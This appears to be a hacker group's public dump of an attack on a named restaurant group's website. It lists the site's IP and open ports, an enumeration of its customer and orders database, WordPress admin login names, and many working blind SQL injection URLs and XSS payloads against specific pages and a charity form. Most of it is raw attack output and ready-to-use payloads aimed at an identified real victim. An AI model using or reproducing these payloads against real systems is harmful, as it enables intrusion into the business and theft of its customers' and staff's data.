- Twitter @HTGzSecurity
- Facebook https://www.facebook.com/An0nBlank
- HTGz Security
- ~ By HTGz Security
- #Operation HTGz Security
- ++++++++++++++++++++++++++
- *==================================================================================================*
- | Domain: http://www.maxrestaurantgroup.com/ |
- | Server: Apache |
- | IP: 70.166.50.25 |
- |open port 110/tcp on 70.166.50.25 |
- |open port 443/tcp on 70.166.50.25 |
- |open port 143/tcp on 70.166.50.25 |
- |open port 21/tcp on 70.166.50.25 |
- |open port 587/tcp on 70.166.50.25 |
- |open port 80/tcp on 70.166.50.25 |
- |open port 10025/tcp smtp qmail smtpd |
- |8443/tcp open http Apache httpd |
- *==================================================================================================*
- http://www.maxrestaurantgroup.com
- [200] ActiveX[Flash-ActiveX][D27CDB6E-AE6D-11cf-96B8-444553540000],
- Adobe-Flash, Apache[2.x],
- Country[UNITED STATES][US],
- HTTPServer[Apache],
- IP[70.166.50.25],
- JQuery, Object["application/x-shockwave-flash]["clsid:D27CDB6E-AE6D-11cf-96B8-444553540000], Script[text/javascript], Title[Welcome to the Max Restaurant Group]
- databases (2)
- information_schema
- maxdiningcard
- Database:maxdiningcard
- (76 tables)
- *===========================*
- | RecordLocks |
- | RecycleBin |
- | RecycleBinTechSupport |
- | categories_12-08-2011 |
- | orders_01-11-2012 |
- | orders_05-17-2012 |
- | orders_backup-07-14-2011 |
- | orders_backup-07-15-2011 |
- | calendar |
- | calendar_events_locations |
- | calendar_images_videos |
- | categories |
- | categories2 |
- | coupon_customers |
- | coupons |
- | coupons_customers |
- | customers |
- | documents |
- | emails |
- | grouping_general |
- | hits |
- | hits_clean |
- | ipbans |
- | jobs |
- | locations |
- | max__shipopt |
- | max_albums |
- | max_blogposts |
- | max_blogusers |
- | max_categories |
- | max_customers |
- | max_emails |
- | max_galleries |
- | max_gallerygroups |
- | max_optionitems |
- | max_optionproducts |
- | max_options |
- | max_optionsproducts |
- | max_orders |
- | max_photos |
- | max_products |
- | max_products_sold |
- | max_promocodes |
- | max_subcategories |
- | max_watermarks |
- | menu |
- | menu2 |
- | orders |
- | orders_TEMP |
- | pdfs |
- | people |
- | phoneorders |
- | pressreleases |
- | products |
- | products_discounts |
- | products_htmlemails |
- | recipes |
- | resumes |
- | reviews |
- | temp_orders |
- | temp_redem_orders |
- | thecooper_registrations |
- | votes |
- | websiteusers |
- | wp_ak_twitter |
- | wp_commentmeta |
- | wp_comments |
- | wp_links |
- | wp_options |
- | wp_postmeta |
- | wp_posts |
- | wp_term_relationships |
- | wp_term_taxonomy |
- | wp_terms |
- | wp_usermeta |
- | wp_users |
- *===========================*
- Database:maxdiningcard
- Table:RecycleBin
- *============*
- | Column |
- *============*
- | timestamp |
- | companyid |
- | data |
- | id |
- | identifier |
- | tablename |
- *============*
- Database:maxdiningcard
- Table:emails
- (5 columns)
- *============*
- | Column |
- *============*
- | active |
- | companyid |
- | email |
- | id |
- | name |
- *============*
- Database:maxdiningcard
- Table:max_emails
- (6 columns)
- *===========*
- | Column |
- *===========*
- | date |
- | email |
- | emailfrom |
- | emailto |
- | id |
- | subject |
- *===========*
- Database:maxdiningcard
- Table:wp_users
- (10 columns)
- *=====================*
- | Column |
- *=====================*
- | display_name |
- | ID |
- | user_activation_key |
- | user_email |
- | user_login |
- | user_nicename |
- | user_pass |
- | user_registered |
- | user_status |
- | user_url |
- *=====================*
- Database:maxdiningcard
- Table:wp_users
- (4 entries)
- *============*
- | user_login |
- *============*
- | bmitchell |
- | bobbyv |
- | lmahon |
- | newwave |
- *============*
- Database:maxdiningcard
- Table:wp_users
- (4 entries)
- Emails:
- -------------------------------------------------------------------------------------------------------------------------------------------------
- Blind SQL Injection
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/amia/staff.php?id=4'+AND+'1'='1
- | Keyword: introduction
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/downtown/staff.php?id=2'+AND+'1'='1
- | Keyword: Steven
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/oyster/staff.php?id=3'+AND+'1'='1
- | Keyword: developed
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/trumbull/staff.php?id=5'+AND+'1'='1
- | Keyword: Partner
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/amore/staff.php?id=6'+AND+'1'='1
- | Keyword: native
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/tavern/staff.php?id=18'+AND+'1'='1
- | Keyword: General
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/fish/staff.php?id=22'+AND+'1'='1
- | Keyword: Managing
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/burger/staff.php?id=20'+AND+'1'='1
- | Keyword: Managing
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/fish/staff.php?id=26'+AND+'1'='1
- | Keyword: Executive
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/store/store.php?StoreLevel=1&Level1=95+AND+1=1
- | Keyword: Valley
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/store/store.php?StoreLevel=1&Level1=102+AND+1=1
- | Keyword: orders
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/store/store.php?StoreLevel=1&Level1=35+AND+1=1
- | Keyword: Restaurant
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/store/store.php?StoreLevel=1&Level1=92+AND+1=1
- | Keyword: Downtown
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/store/store.php?StoreLevel=1&Level1=94+AND+1=1
- | Keyword: Downtown
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/store/store.php?StoreLevel=1&Level1=93+AND+1=1
- | Keyword: Restaurant
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/amia/staff.php?id=30'+AND+'1'='1
- | Keyword: Executive
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/amore/staff.php?id=23'+AND+'1'='1
- | Keyword: General
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/amore/staff.php?id=11'+AND+'1'='1
- | Keyword: Executive
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/trumbull/staff.php?id=24'+AND+'1'='1
- | Keyword: General
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/downtown/staff.php?id=32'+AND+'1'='1
- | Keyword: Executive
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/oyster/staff.php?id=7'+AND+'1'='1
- | Keyword: Executive
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/tavern/staff.php?id=29'+AND+'1'='1
- | Keyword: Executive
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/burger/staff.php?id=33'+AND+'1'='1
- | Keyword: McKenzie
- |Vul (Blind SQL-i) http://www.maxrestaurantgroup.com/burger/staff.php?id=31'+AND+'1'='1
- | Keyword: General
- -------------------------------------------------------------------------------------------------------------------------------------------------
- -------------------------------------------------------------------------------------------------------------------------------------------------
- | Cross-Site Scripting (XSS)
- | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
- | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=<script>alert('XSS')</script>&FormVars[Justification]=123
- | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
- | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=<IMG SRC="javascript:alert('XSS');">&FormVars[Justification]=123
- | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
- | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&FormVars[Justification]=123
- | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
- | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&FormVars[Justification]=123
- | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
- | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&FormVars[Justification]=123
- | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
- | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=<body onload="javascript:alert('XSS')"></body>&FormVars[Justification]=123
- | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
- | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=<table background="javascript:alert('XSS')"></table>&FormVars[Justification]=123
- | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
- | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=123&FormVars[Justification]=<script>alert('XSS')</script>
- | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
- | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=123&FormVars[Justification]=<IMG SRC="javascript:alert('XSS');">
- | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
- | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=123&FormVars[Justification]=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
- | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
- | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=123&FormVars[Justification]=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
- | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
- | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=123&FormVars[Justification]=<DIV STYLE="background-image: url(javascript:alert('XSS'))">
- | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
- | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=123&FormVars[Justification]=<body onload="javascript:alert('XSS')"></body>
- | Vul (XSS) http://www.maxrestaurantgroup.com/charity-form.php
- | Post data: &FormVars[What_is_your_organization_name]=123&FormVars[What_is_your_organization_website]=123&FormVars[What_is_your_organization_Tax_Id]=123&request_logo=123&FormVars[First_Name]=123&FormVars[Last_Name]=123&FormVars[Email]=123&FormVars[Phone]=123&FormVars[Alternate_Phone]=123&FormVars[Address]=123&FormVars[Address2]=123&FormVars[Zipcode]=123&FormVars[City]=123&FormVars[About_how_many_people_will_be_attending]=123&FormVars[Please_send_me_information_regarding_your_private_event_space]=123&request[reqinfo]=123&captcha[id]=123&captcha[input]=123&commit=123&FormVars[How_will_you_use_this_donation_if_granted]=123&FormVars[What_type_of_cause_does_your_organization_support]=123&FormVars[State]=123&FormVars[Event_Month]=123&FormVars[Event_Date]=123&FormVars[Event_Year]=123&FormVars[What_would_you_like_us_to_donate]=123&FormVars[Justification]=<table background="javascript:alert('XSS')"></table>
- -------------------------------------------------------------------------------------------------------------------------------------------------